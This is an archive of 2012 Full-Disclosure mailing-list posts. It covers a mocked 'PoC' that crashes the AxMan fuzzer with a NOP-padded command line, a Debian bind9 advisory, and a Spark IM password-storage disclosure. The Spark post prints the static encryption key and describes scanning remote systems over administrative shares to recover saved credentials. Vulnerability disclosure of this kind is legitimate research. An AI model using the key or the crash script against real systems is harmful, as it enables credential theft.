[Full-disclosure] Comments group
nice infografixs http://go.bloomberg.com/multimedia/china-hackers-activity-logged-reveals-multiple-victims-worldwide/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption PoC
In which case I would like his follow up email read both on my wedding night and funeral (hopefully different nights) Sent using BlackBerry® from Orange -Original Message- From: Thor Date: Tue, 31 Jul 2012 10:09:06 To: Cc: kaveh ghaemmaghami; ; Subject: Re: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption PoC Nope. He's serious. We had an offline discussion (if you want to call it that) where he maintains it is a problem and that other people "appreciate" it. t On Jul 31, 2012, at 9:25 AM, James Condron wrote: > Its a piss take. Of course its a piss take. > > Sent using BlackBerry® from Orange > > -Original Message- > From: kaveh ghaemmaghami > Sender: full-disclosure-boun...@lists.grok.org.uk > Date: Sun, 29 Jul 2012 15:08:44 > To: > Subject: Re: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption > PoC > > I think ur on vacation now aren't u Plus nobody ask u to read my > post and i am not interested about ur opinion keep it for yourself > > On Sat, Jul 28, 2012 at 5:21 PM, kaveh ghaemmaghami > wrote: >> Exploit Title: AxMan ActiveX fuzzing <== Memory Corruption PoC >> Crash : http://imageshack.us/f/217/axman.jpg/ >> Date: July 28, 2012 >> Author: coolkaveh >> coolka...@rocketmail.com >> Https://twitter.com/coolkaveh >> Vendor Homepage: http://digitaloffense.net/tools/axman/ >> version : 1.0.0 >> Tested on: windows 7 SP1 >> >>Crash The Exploiter >> Lame HD Moore fuzzer Memory Corruption >> By Awsome coolkaveh >> >> --- >> >> import os >> import win32api >> crash = " Crash The Exploiter " >> lame="Lame HD Moore fuzzer Memory corruption " >> awsome=" By Awsome coolkaveh " >> print >> print >> print >> print crash >> print >> print lame >> print >> print awsome >> print >> print >> print >> print >> exploit = ("\x90" *800) >> win32api.WinExec((r'"D:\axman-1.0.0\bin\axman.exe" %s') % exploit, 1) > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption PoC
Nope. He's serious. We had an offline discussion (if you want to call it that) where he maintains it is a problem and that other people "appreciate" it. t On Jul 31, 2012, at 9:25 AM, James Condron wrote: > Its a piss take. Of course its a piss take. > > Sent using BlackBerry® from Orange > > -Original Message- > From: kaveh ghaemmaghami > Sender: full-disclosure-boun...@lists.grok.org.uk > Date: Sun, 29 Jul 2012 15:08:44 > To: > Subject: Re: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption > PoC > > I think ur on vacation now aren't u Plus nobody ask u to read my > post and i am not interested about ur opinion keep it for yourself > > On Sat, Jul 28, 2012 at 5:21 PM, kaveh ghaemmaghami > wrote: >> Exploit Title: AxMan ActiveX fuzzing <== Memory Corruption PoC >> Crash : http://imageshack.us/f/217/axman.jpg/ >> Date: July 28, 2012 >> Author: coolkaveh >> coolka...@rocketmail.com >> Https://twitter.com/coolkaveh >> Vendor Homepage: http://digitaloffense.net/tools/axman/ >> version : 1.0.0 >> Tested on: windows 7 SP1 >> >>Crash The Exploiter >> Lame HD Moore fuzzer Memory Corruption >> By Awsome coolkaveh >> >> --- >> >> import os >> import win32api >> crash = " Crash The Exploiter " >> lame="Lame HD Moore fuzzer Memory corruption " >> awsome=" By Awsome coolkaveh " >> print >> print >> print >> print crash >> print >> print lame >> print >> print awsome >> print >> print >> print >> print >> exploit = ("\x90" *800) >> win32api.WinExec((r'"D:\axman-1.0.0\bin\axman.exe" %s') % exploit, 1) > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption PoC
Its a piss take. Of course its a piss take. Sent using BlackBerry® from Orange -Original Message- From: kaveh ghaemmaghami Sender: full-disclosure-boun...@lists.grok.org.uk Date: Sun, 29 Jul 2012 15:08:44 To: Subject: Re: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption PoC I think ur on vacation now aren't u Plus nobody ask u to read my post and i am not interested about ur opinion keep it for yourself On Sat, Jul 28, 2012 at 5:21 PM, kaveh ghaemmaghami wrote: > Exploit Title: AxMan ActiveX fuzzing <== Memory Corruption PoC > Crash : http://imageshack.us/f/217/axman.jpg/ > Date: July 28, 2012 > Author: coolkaveh > coolka...@rocketmail.com > Https://twitter.com/coolkaveh > Vendor Homepage: http://digitaloffense.net/tools/axman/ > version : 1.0.0 > Tested on: windows 7 SP1 > > Crash The Exploiter > Lame HD Moore fuzzer Memory Corruption > By Awsome coolkaveh > > --- > > import os > import win32api > crash = " Crash The Exploiter " > lame="Lame HD Moore fuzzer Memory corruption " > awsome=" By Awsome coolkaveh " > print > print > print > print crash > print > print lame > print > print awsome > print > print > print > print > exploit = ("\x90" *800) > win32api.WinExec((r'"D:\axman-1.0.0\bin\axman.exe" %s') % exploit, 1) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption PoC
In other news, running local commands grants code execution :) I am surprised you didn't allocate a CVE, -HD -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of kaveh ghaemmaghami Sent: Saturday, July 28, 2012 7:21 PM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption PoC Exploit Title: AxMan ActiveX fuzzing <== Memory Corruption PoC Crash : http://imageshack.us/f/217/axman.jpg/ Date: July 28, 2012 Author: coolkaveh coolka...@rocketmail.com Https://twitter.com/coolkaveh Vendor Homepage: http://digitaloffense.net/tools/axman/ version : 1.0.0 Tested on: windows 7 SP1 Crash The Exploiter Lame HD Moore fuzzer Memory Corruption By Awsome coolkaveh --- import os import win32api crash = " Crash The Exploiter " lame="Lame HD Moore fuzzer Memory corruption " awsome=" By Awsome coolkaveh " print print print print crash print print lame print print awsome print print print print exploit = ("\x90" *800) win32api.WinExec((r'"D:\axman-1.0.0\bin\axman.exe" %s') % exploit, 1) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] anti emet3.5
The exploit was written in 2009 anti dep+aslr and anti anti rop http://hi.baidu.com/yuange1975/blog/item/b7de7ed35f94d9fea9ec9a86.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security Problem with Google’s 2-Step Authentication
This is quite common. Further, please post your discovery on the list. On Mon, 30 Jul 2012 11:41:52 -0300, Pablo Ximenes wrote: > Hi Folks, > > I'd like to share with you one of my findings that failed to get > Google's Security Reward. Although Google doesn't consider it a > security problem, some might find it at least amusing if not > interesting. > > Check it out: http://ximen.es/?p=653 > > Sorry for typos, cross posting, and lack of accuracy. > > Regards, > > Pablo Ximenes > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Spark IM Client Local Password Decryption
The open source Spark IM client from Ignite Realtime has a feature that can save the user's password - this password is stored insecurely due to the use of a static encryption key. The password is stored in a file called "spark.properties" and is encrypted with Triple DES in ECB mode. The problem is that the key used to encrypt it is static (see source file "Encryptor.java") thus all users of the application share a single key to 'protect' their password. Because of this, it's trivial to write a tool to scan for and decrypt these passwords. The Base64 encoded key is: ugfpV1dMC5jyJtqwVAfTpHkxqJ0+E0ae I've written a simple tool (link below) that will scan a system (Windows only) and provide a list of recovered user names and passwords; to simplify auditing, it can also scan remote systems by using the administrative share. To perform this scan, the attacker needs to have access to the user's profile directory either via local administrator privileges or misconfigured permissions. Spark is often used with the Openfire jabber server (also from Ignite Realtime) as an internal IM solution, and can be configured to use LDAP for authentication - which makes the recovered credentials far more interesting. As of the current version (2.6.3), there does not seem to be a way to disable this feature. More details: http://adamcaudill.com/2012/07/27/decrypting-spark-saved-passwords/ Decryption Tool: https://github.com/adamcaudill/sparkim-passview Spark: http://www.igniterealtime.org/projects/spark/ My apologies if this had been previously documented; in my research I was unable to find anything. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2517-1] bind9 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2517-1 secur...@debian.org http://www.debian.org/security/Nico Golde July 30, 2012 http://www.debian.org/security/faq - - Package: bind9 Vulnerability : denial of service Problem type : remote Debian-specific: no CVE ID : CVE-2012-3817 Einar Lonn discovered that under certain conditions bind9, a DNS server, may use cached data before initialization. As a result, an attacker can trigger and assertion failure on servers under high query load that do DNSSEC validation. For the stable distribution (squeeze), this problem has been fixed in version 1:9.7.3.dfsg-1~squeeze6. For the testing distribution (wheezy), this problem will be fixed soon. For the unstable distribution (sid), this problem has been fixed in version 1:9.8.1.dfsg.P1-4.2. We recommend that you upgrade your bind9 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlAW6h0ACgkQHYflSXNkfP9ucwCeIE5n640F3YyET/snKF3DrZmU VzoAnAh1loRVh6LcThFdnyHzneKjGFf8 =wUXn -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/